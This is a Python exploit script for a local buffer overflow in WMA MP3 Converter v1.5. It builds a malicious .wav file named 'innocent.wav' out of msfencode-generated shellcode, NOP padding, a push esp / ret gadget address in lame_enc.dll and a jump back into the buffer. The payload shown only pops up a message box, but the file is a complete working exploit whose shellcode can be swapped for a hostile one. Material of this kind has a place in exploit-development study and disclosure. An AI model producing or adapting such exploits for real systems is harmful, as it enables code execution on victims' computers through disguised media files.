#!/usr/bin/python -w ################################################################################### # Exploit: WMA MP3 Converter v1.5 (.wav) Local BOF # # OS: Only tested on Win7 SP1 PRO (lame_enc.dll might be subject to rebase) # # Author: b33f (Ruben Boonen) # # Software: http://www.newsoftware.us/free-wma-mp3-converter/download/pages-2.html# #---------------------------------------------------------------------------------# # This is a improved rework of Julien Ahrens POC using a different # # technique to gain more space and enumerate the actual badchar list # # which is 2 characters not 7. # ################################################################################### filename="innocent.wav" ############################################################################### # msfpayload windows/messagebox TEXT='Who uses *.wav anyway!!' TITLE='b33f' R|# # msfencode -b '\x00\x0A' -t c # # => size 297 # ############################################################################### msgbox = ( "\xd9\xeb\xd9\x74\x24\xf4\x58\xbd\xf1\xd4\x41\xc7\x33\xc9\xb1" "\x44\x83\xe8\xfc\x31\x68\x15\x03\x68\x15\x13\x21\x98\x2c\x48" "\x13\x6f\x97\x9a\x95\x42\x65\x15\xe7\xab\xee\x52\x76\x1c\x64" "\x12\x75\xd7\x0c\xc6\x0e\xa1\xf8\x7d\x6e\x0e\x72\xb7\xb7\x01" "\x9c\xc2\x34\xc4\x9d\xfd\x44\x16\xfd\x76\xd6\xfd\xda\x03\x62" "\xc2\xa9\x47\x45\x42\xaf\x8d\x1e\xf8\xb7\xda\x7b\xdd\xc6\x37" "\x98\x29\x80\x4c\x6b\xd9\x13\xbc\xa5\x22\x22\x80\x3a\x70\xc1" "\xc0\xb7\x8e\x0b\x0f\x3a\x90\x4c\x64\xb1\xa9\x2e\x5e\x12\xbb" "\x2f\x15\x38\x67\xb1\xc2\xdb\xec\xbd\x5f\xaf\xa9\xa1\x5e\x44" "\xc6\xde\xeb\x9b\x31\x57\xaf\xbf\xdd\x09\xec\x72\xd5\xe0\x26" "\xfb\x03\x7b\x04\x94\x45\x32\x86\x89\x08\x23\x09\xae\x52\x4c" "\xbc\x14\xa9\x08\xc0\x4e\x53\x1d\xbb\x73\xb0\xb0\x2b\x05\x47" "\xcb\x54\x93\xfd\x3c\xc2\xc8\x91\x1c\x53\x79\x59\x6f\x7d\x1d" "\xf5\xfa\xf2\xb8\x77\x8d\xa8\x66\x72\x04\xb6\x31\x7d\x43\x32" "\x37\x43\x3c\x81\xef\xe6\xf0\x49\x68\xfa\x2e\xe3\x9f\x62\xd0" "\xfc\x9f\x0d\x76\x22\x40\xee\xee\x40\xb3\xdd\x88\xb5\x68\xa9" "\x09\x91\x8a\x23\x52\xb1\xeb\x12\xb4\x19\x64\x3b\xcf\xee\x15" "\xab\x4e\x66\xf6\x4a\xf9\xa6\xdc\xa2\x8e\xce\x55\xc8\x15\x7d" "\xfe\x79\xbe\xee\xde\xb4\xf7\x78\x52\x93\x10\xf1\x8a\xea\xcc" "\x53\x1e\x5c\xa3\xac\x70\x6f\x83\x02\x8e\xc5\x0b") ############################################################################### # (*) Badchars => \x00\x0A # # (1) 0x100138be : push esp # ret => lame_enc.dll # # (2) We tag on a single NOP because the application doesn't make a clean jmp # # to ESP, there is a '\x30' which would otherwhise contaminate our # # following instructions. # # (3) Jump back to the beginning of our buffer and to our shellcode # ############################################################################### shellcode = "\x90"*10 + msgbox buffer = shellcode + "\x90"*(4112-len(shellcode)) + "\xBE\x38\x01\x10\x90\xE9\xEC\xEF\xFF\xFF" textfile = open(filename , 'w') textfile.write(buffer) textfile.close()